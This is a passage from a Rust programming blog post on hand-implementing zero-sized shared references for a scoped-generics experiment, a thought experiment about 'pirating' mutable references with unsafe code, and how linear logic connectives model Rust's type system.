it) as seen from a programming-language point of view, and c) how they relate to
each other. Hopefully the insights will make Rust easier to reason about, or
maybe even reduce some of the shared/mutable duplication that Rust seems to
struggle with.
And along the way, we might do more than a little copying of things that you
aren't supposed to
Copy
.
Starting the experiment
First, a quick summary of what I'm trying to do, for those who haven't read the
previous blog post. In Rust, a "const generic" is a way to parameterise a type
using a number that's a compile-time constant: for example, a Rust "array" (as
opposed to a "slice" or "vector") has a length known at compile time, with types
like
[i32; 4]
(an array of 4 32-bit integers) and
[i32; 8]
(an array of 8
32-bit integers) being different because the const generic is different. Scoped
generics let you do something similar with values that aren't compile-time
constants (and might not be numbers), under the conditions that a) the type
parameter is stored in a variable and b) all values of types parameterised by
the variable must be discarded before the variable goes out of scope or has its
value change. The conditions mean that the parameter is "effectively constant"
from the point of view of values of the type (because the value will be gone by
the time the parameter changes); unlike const generics (which use a compile-time
check for equal values to see whether two parameters are the same), two
scoped-generic parameters are considered the same (for the purpose of checking
whether types containing them are the same) by checking to see whether they are
stored in the same variable.
One advantage of experimenting with how a new language feature might work is
that you don't need to come up with a finished implementation immediately. For
the purpose of an experiment, a) it's OK if the syntax isn't very good, and b)
it's OK if the feature doesn't work in all cases, as long as it works in enough
practically useful cases to get an idea of how it would work in practice.
Additionally, I've never built the Rust compiler myself, and my computer
probably doesn't have enough memory or free disk space to do so. That pointed
me towards trying to do my experiment by writing a new library, rather than
trying to change the compiler: I wouldn't be able to implement every aspect of
the feature, and the syntax would be worse, but it'd be easier and produce
results faster.
It also allowed me to not bother with trying to work out a case that would
otherwise be very hard to implement: scoped generics are a sort of
type-system-level reference to local variables, which means that a full/final
implementation of them would support the same scoping behaviour as local
variables do (meaning that if a function containing a scoped variable runs
recursively, each level of recursive calls creates its own scoped generic). For
the purpose of my experiment, I decided to instead use a less general
implementation (especially because the full version may be unimplementable in
present Rust): storing, at every location in the program which uses a local
variable as a scoped generic, a reference to the local variable into a global
variable specific to that location (and representing the scoped generic as a
Rust type that hard-codes a reference to the global variable). This is not
re-entrant, i.e. it doesn't work properly in the presence of multi-threaded or
recursive code, which would make it an inappropriate final implementation for
the language feature; but it's fine for experimental purposes, because there are
plenty of single-threaded non-recursive programs which would find the feature
useful and could be used to evaluate it.
Representing the scoped generic as a Rust type lets Rust's existing type checker
do the type-checking (as it already knows how to check whether type parameters
are the same), so that's a huge amount of code that doesn't need writing for the
experiment. Some code is still needed, though: it's necessary to implement the
rule that values of types that use the scoped generic can't outlive the value of
the scoped generic, and to implement a way to get at the value of the generic
parameter (but only within its lifetime). Both of those are tied to the same
lifetime, meaning that the type that needs implementing is "something that has a
lifetime and that can provide access to the value in a given global variable
during that lifetime". I'll call a value of such a type a "Thing A".
A Thing A is almost sufficient to implement scoped generics simply by a)
embedding it in the type that has the generic and b) parameterising the type on
what specific type of Thing A we have (because each one is tied to a different
global variable). The only things it can't do are a) be initialised correctly
in code that's used re-entrantly, and b) implement traits like
Default
with
methods that aren't based on an existing value. But it's close enough to
evaluate the feature and see if any lessons are learned about it.
So what is a Thing A? It has a lifetime; during that lifetime, it lets you get
at the value stored in something; and it probably has to be
Copy
(otherwise
you couldn't embed it in other
Copy
things). It can't be
Send
unless the
thing it references is
Sync
, otherwise you'd have a trivial soundness bug. So
far, this sounds an awful lot like a Rust shared reference. But, it also has to
have zero size (part of the purpose of scoped generics is to allow a large
number of objects to all reference the same thing without using extra memory
per-object), which Rust shared references don't (they're represented as
pointers). So a Thing A is a… manually implemented?… shared reference that
hard-codes the address (rather than containing a pointer).
So far, so good. Once my reasoning reached this point, I set out to manually
implement shared references – basically aiming to replicate Rust's existing
shared references, except with a hard-coded address – and also to implement the
code that stored values in global variables in a sound way (i.e. checking that
the code
isn't
being used re-entrantly). And that's when I started learning
things.
Lots and lots of references
This blog post is really about the "manually implementing shared references",
but it'll be easier to understand the problems that arose by first starting with
the code for storing into the global variable. When we enter the scope of the
scoped generic, we need to assign a value to it. But we're writing in Rust,
where you can't "just" assign to global variables whenever you like, because
that would frequently be unsound. Instead, you need to give the global variable
a cell type (i.e. a type that permits writes even if you don't have a mutable
reference), using that cell type's rules for writes in order to prove safety.
(Early Rust did let you write to global variables directly in
unsafe
blocks,
and this is still supported for backwards compatibility, but nowadays it is
preferable to use
UnsafeCell
: it supports the same operations, but with an API
that is more consistent with the rest of the language.)
There are only three potentially viable options for this type of cell in the
Rust standard library:
Mutex
. The semantics of this are fine, but it has the major issue that to
use this efficiently, we'd somehow need to create a zero-sized reference to
the
MutexGuard
(which would be a non-global value borrowed at runtime),
and I don't know of a solution to that problem other than scoped generics
which sadly can't be used to implement themselves. There's an inefficient
solution which involves locking the
Mutex
every time the value is
accessed, but that seems like far too much overhead even for an experiment.
(There's also the more minor issue that a type system feature should work in
#[no_std]
code, which would rule out mutex-based implementations for the
final version of the feature, but they would probably be OK while
experimenting.)
AtomicPtr
. This is a little semantically awkward because it doesn't
remember the lifetime, so we'd have to track the lifetimes manually, which
is easy to get wrong. It almost works, though – as long as we're storing a
reference to a
Sized
object. Storing a reference is fine (it's just one
level of indirection), but the
Sized
requirement seems unnecessary, and
part of the purpose of an experiment is to determine what restrictions are
needed, so experiments should aim to avoid incurring restrictions unless
they can see how a non-experimental version of the feature would be able to
avoid them.
(While writing this, it crossed my mind that the
Sized
requirement could
be avoided with a second level of indirection, but I don't like to use two
levels of indirection for something that shouldn't require them.)
UnsafeCell
. Can store anything (which is perfect for our purposes) but
can't soundly be used re-entrantly. We weren't planning to use it
re-entrantly anyway, though, so that makes a perfect fit. For soundness,
the code does need to
check
that it isn't being used re-entrantly, but
that's easy to implement: a single
AtomicBool
to see whether the
UnsafeCell
is currently in use is enough for the check, together with a
MutexGuard
-like object (that can be zero-sized) to remember that the
check succeeded.
UnsafeCell
looks like the best option here: it just needs to be wrapped into a
safe abstraction that ensures it isn't being concurrently accessed, panicking if
an attempt to use it for a second purpose is made while it's still in use for
the first. The resulting abstraction has almost identical semantics to
RefCell
, except that it's
Sync
, which gives the fairly obvious name
SyncRefCell
. (I suspect that the Rust standard library doesn't provide the
abstraction in question, even though it's sound, because attempting to use it in
multi-threaded code would panic whenever there was contention, and if something
is almost unusable in multi-threaded code there's no real purpose to making it
Sync
. But global variables have to be
Sync
, so I needed the new
abstraction.)
Now, let's see what would have to be done to manually implement a (zero-sized)
shared reference to the inside of a
SyncRefCell
(and I'm going to start
counting the number of different reference-like types that are needed). First,
we need a way to get from a zero-sized object to the address of the outside of
the cell (
1
): that's just a zero-sized type whose
Deref
implementation
returns a reference to the global variable. Next, we need a way to get from the
outside to the inside of the cell (
2
): that needs a zero-sized structure
that both lets us access the inside of the cell, and remembers that "we own the
cell" (the reference that owns the cell should be able to read and write it, but
other references to the cell should cause a panic, so we need a type to remember
the difference). This is basically the same sort of thing as
MutexGuard
or
cell::RefMut
from the standard library, and is fairly straightforward to
implement: we just need to embed one of the zero-sized references-to-the-outside
in it, in addition to some fairly standard
PhantomData
-for-lifetime. However,
this type needs a destructor (to unlock the cell once it's no longer
referenced), meaning that it's unsound to copy it (or the destructor would run
twice) and thus is only usable as a mutable reference to the inside. So yet
another type is needed to represent a share of the
MutexGuard
equivalent
(
3
): it has the same semantics as a shared reference to a type 2, except
that a) it's zero size and b) there isn't an extra layer of indirection in the
Deref
implementation.
OK, so the next problem is: what type do we put inside the
UnsafeCell
? We
want it to be able to hold references, and when doing that, the type of the
reference is
mostly
known but we don't know the lifetimes (because if code
that creates a scoped generic runs in a loop, it could be referencing a
different object each time, with disjoint lifetimes, and so the lifetimes will
be different). Back when I wrote my previous blog post, I thought that this
particular sticking-point would render the global-variable technique non-viable,
but there is a solution: references which are the same apart from lifetimes (of
the reference itself and of the type they reference) have the same size and
alignment, so you can create a block of uninitialised memory (of the right size
and alignment) and interpret it as the various different possible types by
transmuting it. (In fact, if you know that nobody else is using the block of
memory in question, you can even
transmute it in safe
code
, because an
uninitialised instance of one type is clearly safe to interpret as an
uninitialised instance of another type with the same size/alignment in that
case.) So, what's needed is a
MaybeUninit
containing some pointer-sized
memory. We need to be able to create a "transmuted reference" to it that
interprets it as a
MaybeUninit
of some particular type (
4
). Then we need
to track the fact that it's been initialised (to be able to dereference it
soundly), so we need a
MutexGuard
-like reference to it that records the fact
that it's initialised (
5
). To create the original zero-sized references,
each of them will need to be able to embed the guard-like reference, which means
that we need a copiable version that can't mutably dereference (
6
); and when
trying to implement those, we discover that
those
need to embed a type 4,
except type 4 clearly can't be copied because it relies on exclusive access to
make the transmute safe, so we need a copiable version of that without the
ability to write through it (
7
). (A type 7 can do the transmute safely
because it knows that all other coexisting uses of the memory access it via the
same transmute.)
And once we have all that, all we need is a zero-sized reference that embeds a
type 6 and dereferences it twice to get at the object we're actually trying to
reference (
8
), and that's the Thing A that makes it possible to implement
scoped generics. It would be possible to write a mutable version of that too,
but I didn't need it for anything and had become tired of writing
implementations of references.
And that's the point at which a good programmer should start thinking. By now
I'd written very similar code 8 times, with only minor variations, and some of
the thoughts that should prompt are (from least useful to most useful):
Can I get my editor to automate this?
Can I write a macro to automate this?
Can I write a library that handles this?
Can I change the design so that doing this isn't necessary?
Can I improve the programming language I'm using so that doing this isn't
necessary?
(What you
shouldn't
do: you shouldn't try to get an AI coding assistant to
automate it. Even in the general case, this makes the code less maintainable in
the future because you don't have any reliable instructions you can write down
in case you need to do the same task again in the future, and because it leads
to code which is less readable and less editable because it ends up writing out
the repetitive/equal parts every time, rather than storing them all in a common
location. In this specific case, it would be even worse, because this contains
some
unsafe
code which is somewhat subtle with respect to lifetimes: getting
it wrong would cause the resulting code to be unsound and would be difficult to
discover through testing, because you'd need to write a separate
```compile_fail
test for every possible case where a
lifetime might be longer than it should be and I don't even know how to
enumerate those.)
In general, the options towards the end of the list are better than the options
towards the start of the list, as they a) increase the ability that the compiler
has to verify that the code is correct, b) reduce the amount of effort
needed for future maintenance on the code, and c) might even help out unrelated
code in the future (perhaps written by other people).
But to do any of those actions, you need to know the pattern, and I'd now
manually written enough implementations of references to get a pretty clear view
of it. The same pattern appeared to apply to a) writing a
Deref
implementation given the
DerefMut
implementation, and b) implementing a shared
reference given a mutable reference. The basic idea seemed to be to replace all
mutable references with the equivalent shared references, remove destructors and
side-effecting constructors (and other side-effecting methods), convert method
calls from their mutable to shared versions (e.g.
assume_init_mut
became
assume_init_ref
), and add a way to obtain the shared reference from a shared
borrow of the corresponding mutable reference (via converting every field
recursively from mutable to shared, and copying the result to produce a field of
the shared reference).
This looks a lot like a missing language feature: it looks almost like we should
be able to call many methods that take a mutable reference but give them shared
references, and get shared references rather than mutable references in the
result. But, that would almost certainly be unsound if implemented as-is, maybe
in subtle ways. (For example, an
UnsafeCell
can safely be read through a
&mut UnsafeCell
reference, but needs extra safety checks to soundly read it
through the corresponding
&UnsafeCell
reference – the former is an exclusive
reference and thus guarantees that nobody else is writing the
UnsafeCell
at
the time, whereas an
&UnsafeCell
doesn't make any guarantee about who might be
writing the contents because the guarantees Rust usually provides for
&
references don't apply inside cells.)
I wouldn't blame anyone for giving up at this point (or indeed earlier), but I'm
the sort of person who likes to keep going along this line of investigation. I
wanted to know: just when is it sound to do this sort of mutable-to-shared
replacement? And in order to work that out, I would need to discover the type
theory that explains what's going on.
"You can't have two mutable references to the same object"
It's time for another experiment, but this time it's a thought experiment. If
Rust supported a general way to convert mutable reference implementations to
shared reference implementations, it would presumably work on Rust's actual
mutable reference implementation,
&'a mut T
, too: instead of needing mutable
and shared references to exist, we'd just need mutable references and an
automatic reference converter. That means that we'd, somehow, have a version of
Rust that managed to make things work without "natively" having shared
references at all. And one of the best ways to find out how to do something is
to try to prove it impossible, and see where the proof breaks down: the gap in
the proof is the solution you were looking for.
The most obvious impossibility is: it's possible to have two shared references
to the same object (and use both concurrently), and if you
couldn't
do that,
most Rust programs would be impossible to write. But one of the most
fundamental rules of Rust is that you can't have two mutable references to the
same object. Rust's aliasing rules aren't fully decided yet, but surely that
one is the most important of all and couldn't possibly have exceptions.
Still, there isn't much to do here but try. I was once watching someone play a
card game, and they had two copies of a card that would have been really useful
in their situation, but unfortunately the rules of the game said that a player
could only play the card in question once per turn. Another spectator said,
sarcastically, that the reason that they couldn't play both is because they
weren't trying hard enough. That line has really stuck with me, and somehow it
seems relevant here.
In Rust, you "can't" copy a mutable reference (except with a reborrow, which
prevents the two copies being used concurrently). But maybe that just means
that I wasn't trying hard enough, and I should do it myself:
fnmain() {let mut a =5i32;let b = &mut a;// SAFETY:// It is better to remain silent and be thought a fool,// than to speak and remove all doubt.let c =unsafe{
core::ptr::read(&raw const b)};println!("{}", *b);println!("{}", *c);}
This seemed promising: if Rust won't copy the reference, why don't I just look
at the bits of memory that represent it and form them into a new reference?
Unfortunately, despite this code outright stating that the reference should be
copied, and compiling, it doesn't
actually
copy the reference.
The reason behind this should be familiar to people who have used any
memory-unsafe language, such as C, C++, or unsafe Rust: this program has
undefined behaviour. Memory-unsafe languages have various rules that you have to
follow in order for the program to have any meaning at all; and a program that
contains undefined behaviour is meaningless and might do anything, including
skipping the offending code entirely (an outcome that actually happens quite
frequently in practice). As such, the code can't meaningfully be said to copy
the reference because there is no requirement that the Rust compiler compiles
the code into anything resembling the original program, and the code it actually
produces might therefore not contain the copy. (The standard analogy, dating
back many decades now, is that it is perfectly valid to implement undefined
behaviour by making demons come out of your nose. That's why I didn't test this
program on my own computer, but rather on the Rust playground, in the hope that
if demons
were
summoned, it would be in some distant data centre that could
contain them more easily.)
Still, if you give up after just one failure, you probably weren't trying hard
enough. I'm just going to have to try even harder:
fnmain() {let mut a =5i32;let b = &mut a;// SAFETY: ???let mut c = &mut0;// placeholder, immediately overwrittenunsafe{
core::ptr::copy(&raw const b, &raw mut c,1);};println!("{}", *b);println!("{}", *c);}
Yes, I know the program looks basically identical to the last one: instead of
copying the bits out of a mutable reference and forming them into a
new
mutable reference, I instead copied the bits out of a mutable reference and used
them to overwrite an
existing
mutable reference. But if you run it in Miri, a
Rust interpreter that detects undefined behaviour, something magical (and
somewhat surprising) happens: it runs the program successfully and reports no
undefined behaviour along the way.
This is one of the most subtle areas of Rust, to the extent that I recently
bug-reported a similar situation before learning that it was intended behaviour
rather than a bug (and I wasn't the only person making that sort of mistake). I
think I understand what's happening now, though, and will start with an analogy
from C.
Let's write some C code that prints the value of the
PATH
environment
variable:
puts(getenv("PATH"));
The question I'd like to consider is: is this code thread-safe?
This is a bit more subtle than might be expected, but there's
a good
explanation in the glibc
manual
(see the section about "env"). The basic issue is this: C's
getenv
function
is usually implemented as returning a pointer into inside a global variable
environ
. That pointer is only guaranteed to remain valid as long as nobody
changes
environ
; if it is changed by another thread, the returned value might
get overwritten while we're using it and that could potentially lead to
undefined behaviour, e.g. due to a buffer over-read (you might read the value
after elements have been added to it but before the sentinel to say where the
elements end has been written, and thus read too much) or due to accessing
deallocated memory. Despite all this,
getenv
is typically considered safe:
the reason is that changing
environ
(e.g. via
setenv
) is considered to be
unsound unless you can prove that no other threads are using
environ
at the
time. In other words, we have a combination of two things (
getenv
and
setenv
) that are unsound to use in combination, and one of them is considered
safe, with the other being considered unsafe. (This subtlety lead to
one of
the only cases in Rust's history where a standard library function was
previously marked as safe, but a breaking change was made to mark it
unsafe
:
std::env::set_var
,
Rust's equivalent of
setenv
, became
unsafe
because it might break C code
using
getenv
that ran in parallel (even though it was correctly guarded
against running in parallel with the Rust equivalent).)
This is a demonstration of the fact that there are two ways in which code can
lead to undefined behaviour: either it directly does something that the
compiler/runtime/OS/processor assumes is impossible (potentially causing
arbitrary breakage when the assumption is used to guide optimisations and they
go off the rails), or else it does something that
other code is allowed to
assume
is impossible. If I call
setenv
in a multi-threaded program, that
might lead to undefined behaviour because some other code, perhaps in a library,
might assume that it can safely call
getenv
at the same time. If I call
setenv
and can ensure that nobody is calling
getenv
at the same time, that
isn't undefined behaviour and the program will work correctly. So there are two
shades of "code you aren't allowed to write" here: either 1) the code directly
does something that's undefined and can't possibly be allowed in a valid
program, causing it to instantly become meaningless; or 2) the code breaks some
invariants that other code is allowed to assume will hold, and is sound only if
you can ensure that no code which makes that assumption will run while the
assumption is false.
So, what about the example above? In general, Rust code is allowed to assume
that two concurrently usable mutable references won't alias. For example,
ptr::read
assumes that its return value doesn't alias any mutable reference that
the caller is using (indeed, Rust functions in general do that).
Rust code is allowed to assume that two concurrently usable mutable references
won't alias… but the
compiler
doesn't.
Here's a great demonstration. Suppose we compile these two Rust functions, in
release mode:
In the present version of Rust, the generated machine code for
f1
works like
this: store 2 in
*b
; and store 3 in
*a
. This optimisation is valid because
mutable references
in function arguments
can't alias each other, which is an
assumption that the compiler
is
allowed to make.
In the present version of Rust, the generated machine code for
f2
works
like this: calculate what address
**a
points to and store 1 in it; store 2 in
**b
; then add 2 to the calculated
**a
address.
With
f1
, the compiler has made use of knowledge that
a
and
b
can't alias
with each other. The compiler makes an assumption that mutable references that
are function arguments cannot alias each other, and violating this assumption is
immediate undefined behaviour.
With
f2
, the compiler hasn't made use of knowledge that
*a
and
*b
can't
alias each other, because at least under the current draft of the aliasing
rules, that isn't an actual rule of Rust. There are lots of things that you
can't do with aliasing mutable references, but apparently this isn't one of them
(and returning a reference via writing into memory provided by the caller isn't
either, which is what makes the
ptr::copy
program meaningfully different from
the
ptr::read
program). You can even (if you mark
b
as
mut
) add a call to
f2(&mut b, &mut c)
into the
ptr::copy
program above, and get an output of
two
4
s, even in release mode and even under Miri.
Now, I wouldn't recommend ever doing anything like this for any purpose other
than thought experiments. The rules behind this sort of thing a) are very
subtle and hard to understand, b) can cause arbitrarily bad malfunctions at
runtime, in a way that the compiler can't catch and testing may not be able to
catch either, and c) are subject to change, potentially in ways that break
programs that were previously working. If the Rust developers decided that it
was safe to break the code in this section (i.e. that they wouldn't break too
much existing
unsafe
code in the process), I would be upset that my blog post
was out of date, but happy at the new optimisation opportunities and at the
rules becoming easier to understand.
But in the hypothetical world of thought experiments, in which Rust ended up
being implemented without shared references for some reason, every Rust
programmer would have been writing code like this, and the developers would
ensure that they didn't break all the existing code.
Instead, we'd get one of two scenarios. One is that nobody would use the
alternate-world Rust because it would be even more dangerous than C, and thus
lose most of its reason for existence. And the other, more intriguing, scenario
is that someone would have come up with a framework for making this sort of
thing safe.
A Rust with piracy instead of sharing
In this hypothetical version of Rust, programmers would have: a) mutable
references (which exist in the real version of Rust too), b) a way to copy
things that aren't supposed to be copied (probably with better syntax, as this
would be very widely used to do things that would otherwise need the nonexistent
shared references), and c) some notation that could be used at least in types,
in order to distinguish illegal copies of objects from objects that hadn't been
illegally copied (some operations only work on the latter, so they need to be
distinguished from the former in order to prove those operations safe).
c) puts me in the situation of creating a new language feature, again, even
though this time it's just for a parallel-world hypothetical language for a
thought experiment. I don't have any really good ideas for syntax, so I'll
deploy another lesson that's been learned about experimenting with new language
features: if you don't have a good syntax available, choose an obviously
terrible one in order to prevent a bad placeholder name sticking. (Experimental
Rust APIs have ended up with names like
Yeet
or
BikeshedIntrinsicFrom
based
on this principle, although
Yeet
may not have been bad enough because
apparently some people want to keep it.)
As such, my new notation, for experimental purposes, is going to be a prefix
?
that marks "illegal copy" types: for example, an illegally copied
&'a mut T
would be
?&'a mut T
. This also suggests that prefix
?
would be the operator
for copying uncopiable things in the first place:
fnmain() {let mut a =5i32;let b = &mut a;let c = ?b;println!("{}", *b);println!("{}", *c);}
I think of the
?
operation as "pirating", because it copies something that,
according to the rules, you aren't allowed to copy. Note that after the
let c = ?b;
line, both
b
and
c
are effectively a
?&mut i32
: the original
and copy are copies of each other, so they each have to take the existence of
the other into account.
Thinking about the pirating operation in general (not just as it applies to
mutable references), it seems to be about "halfway" to creating a shared
reference. For example, pirated values are
Copy
(they're already been
illegally copied once, copying them again isn't going to make the situation
worse), can be used to read the original value in most cases, and can be used as
a function argument without consuming the original value. On the other hand,
they're the same size as the original value (rather than being pointer-sized
like references are), can't be used to determine the value's address, and are
unable to write inside a
Cell
(whereas a shared reference is able to do that);
all those changes stem from the pirated values being implemented as a copy of
the original value rather than a reference to it.
This may give you a suspicion (at least, it gave me one): if we pirate a mutable
reference, doesn't the result end up being a shared reference? Pirating a value
directly means that the address is lost and the size is preserved, but if you
pirate a mutable reference, the address is copied and you end up with something
the size of a reference. The only remaining requirement would be to check that
the things that can soundly be done with
?&'a mut T
are the same things that
can soundly be done with normal Rust's
&'a T
, but they certainly seem pretty
similar (e.g. you can't write through it because it might be aliased in another
thread, except if it's a single-threaded program and then you
can
write
through it but can't take a mutable reference through it, etc.).
This is interesting because it suggests a model for the mutable-to-shared
transformation that I was looking for originally. In particular, it specifies
what to do about the type definitions (you just pirate the type, which is
equivalent to pirating all the fields, which is equivalent (except for
PhantomData
weirdness) to pirating all the non-
Copy
fields because copying a
Copy
field isn't illegal). That means that I can check it against the
reference implementations I actually wrote and discover that… it's
almost
right. There's nearly an exact match, except that some of these shared
references have lifetimes when the equivalent mutable references don't.
And thinking about it, there's a reason for that. The mismatch happens in cases
where the mutable reference has a destructor. Say we pirate one of those: then
the destructor won't be able to run safely because it might unlock something
that the pirated version is assuming will stay locked. The only way to make the
code safe is to get rid of all the pirated copies before the destructor runs:
and in Rust, the way to ensure that an object is gone before you do an action is
to give the object a lifetime. It turns out to be fairly easy to implement this
behaviour into the pirating operator
?
: you just give it a lifetime when
applying to types, along the lines of
?'a &'a mut T
, and when the lifetime is
over, the borrowed object is considered to be unpirated again because it now has
no copies to alias it. (At the value level, rather than the type level, the
lifetime behaviour is identical to how a shared reference would behave.) After
making that change to the plans for
?
, the references now match, either
exactly or in a "different implementation that gives the same result" sort of
way.
So it looks like implementing all those references has been a fruitful
experiment in two different ways: a) the implementation should help to give
insights into scoped generics, but b) the implementation also shed light on how
to generate shared-reference code from the mutable-reference version. This is
almost certainly the correct way to transform types. But what does the same
transformation on functions and methods look like? I have some examples and
know what the transformation "feels like", but it would be nice to have
something that's provably correct or at least has some established theory behind
it.
At this point, I'm not sure what someone without a PhD in substructural type
system theory would do. Fortunately, I happened to have the correct background
for solving this particular problem, and spent several hours trying to figure
out whether there was some existing mathematical theory that covered this: first
from memory, then searching through Haskell documentation for types with the
right shape or related-sounding names, then asking friends online. (Haskell is
a great place to check for this sort of thing: no matter what weird
type-system-related thing you're looking for, there's a very good chance that
someone implemented it for Haskell first.) All this effectively had the same
result as talking to a rubber duck would (i.e. the replies were useful only to
rule things out, but it helped streamline my own thoughts to the extent that I
could figure it out on my own), and I eventually started thinking along the
correct lines to discover something very interesting indeed.
Linear logic
<ais523> actually, linear logic probably has an operation for this
somewhere, it has lots of operations like that
— me, suddenly realising that I had been trying to use the wrong branch of
mathematics
Let's take a step back for a moment, to think about programming language type
systems. It was observed, several decades ago now, that programming language
type systems seemed to follow the same rules as systems of logic did (this is
normally known as the "
Curry–Howard
correspondence
").
As a simple example: in logic, if A implies B and B implies C, then A implies C;
and in programming, if you have a function that takes an A and returns a B, and
a function that takes a B and returns a C, you can combine them into a function
that takes an A and returns a C. In general, types in programming languages
tend to follow the same sort of rules as predicates in logic, and programs tend
to follow the same sort of rules as proofs. At least to me, it isn't clear
whether or not this is a coincidence, but because the rules are the same, it
lets you take results from one field and reinterpret them to learn things about
the other (and doing this is valid regardless of whether or not there's a
"reason" for the rules being the same).
There are plenty of different models of logic in philosophy, each of which has
slightly different rules: and most of them make some sort of sense when
interpreted as frameworks for designing programming language type systems, but
the difference in the rules gives you languages of a different general nature.
One thing that many models of logic have in common is that if you have a list of
premises that you're trying to prove something with, you're allowed to use the
premises multiple times, or not at all, or in an arbitrary order. For example,
given an assumption that statements P and Q and R are all true, it's possible to
prove that (P and Q) and (Q and R) in logical systems that try to reflect the
real-world notion of truth, even though that means you have to use your
assumption that Q is true twice. But it's possible to imagine a logic where
some of those rules are removed (this is known as a "substructural" logic). For
example, if premises aren't allowed to be used more than once ("affine" logic),
you end up with a logic in which the truth of the premises get "used up" as you
try to prove things with them, making them useless to prove other things.
Affine logic doesn't seem like a good model for truth and falsity (because it
isn't: in real life, true statements don't stop being true just because you
prove things with them). But its rules are pretty good at modelling other
things, like manufacturing things from resources: the construct which normal
logic would call "P implies Q" can be interpreted in affine logic as "you can
use a P to make a Q". And when viewed as a type system, the resulting effect on
the language is quite interesting: the same construct becomes "the type of a
function from P to Q", but implies that P isn't usable after the call (because
you don't get to use it as an argument for a different function afterwards).
One possible cause of that is that "P was moved into the function", leaving it
unavailable to the caller. At present, there's only one widely used programming
language where functions work like that by default: but it's the language that
this blog post happens to be about. Rust is generally considered to have an
affine type system, under the view of the arguments being moved into the
function and unavailable to the caller.
There are, however, other possible views of affine type systems. I was doing my
PhD at around the time that Rust was being invented, and I was using an affine
type system too (which I like to think gave me a head start on understanding
Rust): but in my case, I was working with an implementation of a language (SCI,
"Syntactic Control of Interference") that compiled it directly into hardware and
which was therefore able to do things in parallel very cheaply. However, this
carried the usual risks of thread-safety issues that come with running code in
parallel, and SCI wanted to avoid that. SCI's solution is to use an affine type
system, considering things that create new threads to "consume" the resources
used in those threads (which includes both hardware resources like multiplier
circuits, and data resources like particular memory cells), preventing them
being used by other threads. On the other hand, if two blocks of code run
sequentially, they would be allowed to share resources.
The difference between these two cases was implemented using something called
"connectives". In classical logic, the connectives are things like "and", "or",
"not". In substructural logics, you have more connectives: each of them is
generally similar to a classical logical connective, but more specific about the
exact way that resources are shared. SCI has different types for the "run in
parallel" and "run in sequence" operators; when running in parallel, resources
couldn't be shared between the threads; but when running in series, they could
be, and that was represented by combining the types of arguments using different
connectives: both the commands took "a command and a command" as their argument,
but "run in parallel" used a version of "and" where the commands were not
allowed to share resources, whereas "run in series" used a version of "and"
which did not have that safety requirement, so the language was able to emulate
two different connectives that would both translate to "and" in classical logic.
"Linear logic" is a substructural logic that, just like affine logic, disallows
using the same premise twice, but which is also notable for having a fairly
large set of connectives. Most of the time that it's used in type theory, it's
used as a tool for creating type systems by picking only the connectives you
need for your language and disregarding the rest: some of them are fairly
obscure, to the extent that the week before I started writing this blog post,
I'd never used them and didn't even really understand what they meant. As such,
when viewed as a type theory, it's more like a framework for developing type
theories than it is a useful type theory in its own right.
But, as it turns out, Rust was already using a fairly large portion of it, and
when modelling the pirating operator, I needed even more. So I'm going to go
over the six "main" connectives in this blog post (known as the "additives,
multiplicatives and exponentials") and try to explain how they relate to Rust.
Understanding the more commonly-used linear logic connectives
I'm going to go through the linear logic connectives in order from easiest to
hardest to understand. As such, I'm going to start with ⊗. Combining two
things with ⊗ basically means that you get both, and can use both: in Rust, this
is a
struct
or tuple, which has multiple fields and you can move out of all of
them. For example, in linear logic, you would model the Rust type
(i32, u32)
as
i32
⊗
u32
, and a struct with an
i32
field and
u32
field would be
modelled the same way (because it isn't really significantly different from a
type theory point of view: you can do the same things with it). A good way to
think about
T
⊗
U
is that to produce it, you must produce a
T
and
a
U
,
and when consuming it, the consumer gets a
T
and
a
U
: simple enough.
Rust's two main tools for creating arbitrary data structures are
struct
s and
enum
s, and it isn't surprising that linear logic has a connective for
enum
s,
too. ⊕ is the construct called
enum
in Rust, "tagged union" in
language-agnostic programming discussions, and "disjoint union" in mathematics:
it represents a value that could have either of two types, and tracks which.
For example, linear logic would model
Result<T, U>
as
T
⊕
U
. To produce a
T
⊕
U
, you only need to be able to produce a
T
or
a
U
; and when
consuming one, the consumer must consume the
T
or
the
U
, whichever one the
producer produced. However, the consumer gets to share resources between the
two possible cases: if (say) it needs to access the same piece of memory to
process a
T
as it does to process a
U
, it can check to see whether it has a
T
or a
U
before deciding what to use the memory for, so the program is still
sound.
The next-simplest connective is &, which represents a single object that can
be viewed as having either of two types. In Rust, this situation occurs with
trait implementations: a
Vec
is a
Vec
, but it's also an
impl Debug
, and
it's also an
impl IntoIterator
, and it implements plenty of other traits too.
Linear logic represents this situation using &: a
T
&
U
is a single
value that can be viewed as either a
T
or a
U
, so to produce a
T
&
U
,
the producer has to be able to produce something that's a
T
and
a
U
, but
when consuming one, the consumer only gets to consume it as a
T
or
a
U
.
(& is unlike ⊕, though, in that the consumer gets to choose which; with ⊕
it's the producer who chooses.)
It's worth noting at this point that linear logic is somewhat flexible with how
it models "time passing" in a program. One common way to use it is to think of
it as representing the types that are
instantaneously
available in a program:
in SCI, the "commands to run in sequence" argument of the sequencing operator
takes a
command
&
command
as its argument. Linear logic indicates that it
should only be able to use one; but the correct interpretation (at least for
SCI) is that it should only be able to use one
at a time
, but nothing prevents
it running the other afterwards, because there's no point in time at which the
state of the program is wrong. If you use the "at a time" view of linear logic
to model Rust, it ends up modelling mutable borrows (because once you get the
value back from a mutable borrow, you can use it for something else, so a
T
&
U
can be borrowed first as a
T
, and later as a
U
); if you use the
"for all time" view instead, it models moves instead. There's probably some
mathematical trick to get it to model both at once, but I don't know what it is.
The last connective I want to consider in this section is !, an "exponential"
that applies to just a single type. In linear logic, !
T
is equivalent to 1
&
T
& (
T
⊗
T
) & (
T
⊗
T
⊗
T
) & … with any number of
T
s
(where 1 is an empty tuple, Rust's
()
); it can be viewed as an inexhaustible
supply of
T
s. From the Rust point of view, this doesn't make much sense as an
operation to apply to arbitrary types
T
. However, the aim is to use linear
logic to model Rust, not Rust to model linear logic, and there's a clear purpose
for ! when modelling Rust: it's used to model
Copy
types. For example,
i32
could be represented as !
NonCopyI32
: if you have an
i32
you can easily
generate more of it (by copying in Rust, or by converting !
NonCopyI32
to
!
NonCopyI32
⊗!
NonCopyI32
in linear logic).
Translating
Copy
types as ! of a non-
Copy
type is interesting because it
teaches us something about Rust. Affine logic doesn't allow you to use values
more than once, without some way to copy them; but linear logic additionally
doesn't allow you to use values
less
than once, without some way to get rid of
them. Rust is normally described as affine because you can get rid of any value
using
mem::forget
, but I think that's misleading: in affine type systems you
can just ignore a value and it vanishes without side effects, whereas in Rust
you can only get rid of a value by dropping it, leaking it, or using an
